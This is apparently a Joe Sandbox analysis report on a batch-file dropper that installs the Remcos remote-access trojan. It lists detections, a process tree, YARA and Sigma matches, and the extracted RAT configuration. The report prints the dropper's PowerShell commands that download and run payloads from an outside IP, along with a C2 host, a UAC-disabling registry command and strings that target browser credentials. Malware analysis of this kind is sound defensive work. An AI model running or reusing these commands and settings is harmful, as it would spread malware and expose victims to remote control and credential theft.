Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
55Ka50lb6Z.bat

Overview

General Information

Sample name:55Ka50lb6Z.bat
renamed because original name is a hash value
Original sample name:4d8b2d19bdd29e6d89e0769cff9b0b48.bat
Analysis ID:1518340
MD5:4d8b2d19bdd29e6d89e0769cff9b0b48
SHA1:07c4469751a5ddf43288b8ea7d32afce71783a2c
SHA256:1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e
Tags:batuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 3580 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4304 cmdline: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3968 cmdline: powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 3428 cmdline: cmd /c C:\Users\user\AppData\Roaming/hi.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • cmd.exe (PID: 6512 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5936 cmdline: powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
          • AUGUST.exe (PID: 3840 cmdline: C:\Users\user\AppData\Roaming/AUGUST.exe MD5: 25860926414BF43383246F7C773A8D6C)
            • DZIPR.exe (PID: 4568 cmdline: "C:\Users\user\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)
              • DZIPR.exe (PID: 5464 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)
                • cmd.exe (PID: 5476 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • explorer.exe (PID: 4016 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • svchost.exe (PID: 3700 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • DZIPR.exe (PID: 6392 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)
    • cmd.exe (PID: 5900 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 4256 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • DZIPR.exe (PID: 508 cmdline: "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)
    • cmd.exe (PID: 1488 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 5972 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\mdvbfllrJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    C:\Users\user\AppData\Local\Temp\mdvbfllrJoeSecurity_RemcosYara detected Remcos RATJoe Security
      C:\Users\user\AppData\Local\Temp\mdvbfllrJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        C:\Users\user\AppData\Local\Temp\mdvbfllrWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aab8:$a1: Remcos restarted by watchdog!
        • 0x6b030:$a3: %02i:%02i:%02i:%03i
        C:\Users\user\AppData\Local\Temp\mdvbfllrREMCOS_RAT_variantsunknownunknown
        • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64b7c:$str_b2: Executing file:
        • 0x65bfc:$str_b3: GetDirectListeningPort
        • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65728:$str_b7: \update.vbs
        • 0x64ba4:$str_b9: Downloaded file:
        • 0x64b90:$str_b10: Downloading file:
        • 0x64c34:$str_b12: Failed to upload file:
        • 0x65bc4:$str_b13: StartForward
        • 0x65be4:$str_b14: StopForward
        • 0x65680:$str_b15: fso.DeleteFile "
        • 0x65614:$str_b16: On Error Resume Next
        • 0x656b0:$str_b17: fso.DeleteFolder "
        • 0x64c24:$str_b18: Uploaded file:
        • 0x64be4:$str_b19: Unable to delete:
        • 0x65648:$str_b20: while fso.FileExists("
        • 0x650c1:$str_c0: [Firefox StoredLogins not found]
        Click to see the 15 entries
        SourceRuleDescriptionAuthorStrings
        0000000F.00000000.2725735029.0000000000401000.00000020.00000001.01000000.00000006.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          0000001C.00000002.3213654065.0000000002F1B000.00000004.00000001.01000000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x14b8:$a1: Remcos restarted by watchdog!
          • 0x1a30:$a3: %02i:%02i:%02i:%03i
          0000001C.00000002.3213566358.0000000002F12000.00000008.00000001.01000000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                Click to see the 52 entries
                SourceRuleDescriptionAuthorStrings
                27.2.explorer.exe.4bedb57.4.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  27.2.explorer.exe.4bedb57.4.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x1dd49:$s1: CoGetObject
                  • 0x1dca2:$s2: Elevation:Administrator!new:
                  23.2.explorer.exe.4dbab57.5.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    23.2.explorer.exe.4dbab57.5.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x1dd49:$s1: CoGetObject
                    • 0x1dca2:$s2: Elevation:Administrator!new:
                    25.2.cmd.exe.5ba00c8.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 74 entries

                      System Summary

                      barindex
                      Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4304, TargetFilename: C:\Users\user\AppData\Roaming\ffo.bat
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, ProcessId: 4304, ProcessName: powershell.exe
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c C:\Users\user\AppData\Roaming/hi.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3428, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , ProcessId: 948, ProcessName: wscript.exe
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4304, TargetFilename: C:\Users\user\AppData\Roaming\ffo.bat
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 3700, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT3E06.tmp
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, ProcessId: 4304, ProcessName: powershell.exe
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, ProcessId: 4304, ProcessName: powershell.exe
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c C:\Users\user\AppData\Roaming/hi.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3428, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , ProcessId: 948, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, ProcessId: 4304, ProcessName: powershell.exe
                      Source: Process startedAuthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5476, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 4016, ProcessName: explorer.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3700, ProcessName: svchost.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\vqqcreAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: C:\Users\user\AppData\Local\Temp\mdvbfllrAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: C:\Users\user\AppData\Local\Temp\yigmovmAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: 25.2.cmd.exe.5ba00c8.7.raw.unpackMalware Configuration Extractor: Remcos {"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Temp\vqqcreJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\mdvbfllrJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\yigmovmJoe Sandbox ML: detected
                      Source: cmd.exe, 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_64955134-1

                      Exploits

                      barindex
                      Source: Yara matchFile source: 27.2.explorer.exe.4bedb57.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.explorer.exe.4dbab57.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.4a65b57.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.55cfa8a.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.explorer.exe.4e79b57.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.4a20a8a.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.explorer.exe.4e34a8a.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.DZIPR.exe.35b39ce.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.explorer.exe.4d75a8a.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.explorer.exe.4bee757.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.55eea8a.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.DZIPR.exe.35b45ce.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.5615757.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5634757.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.4a66757.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.explorer.exe.4e7a757.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.5614b57.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.DZIPR.exe.356e901.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5633b57.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.explorer.exe.4dbb757.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.explorer.exe.4ba8a8a.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001C.00000002.3213566358.0000000002F12000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DZIPR.exe PID: 4568, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED
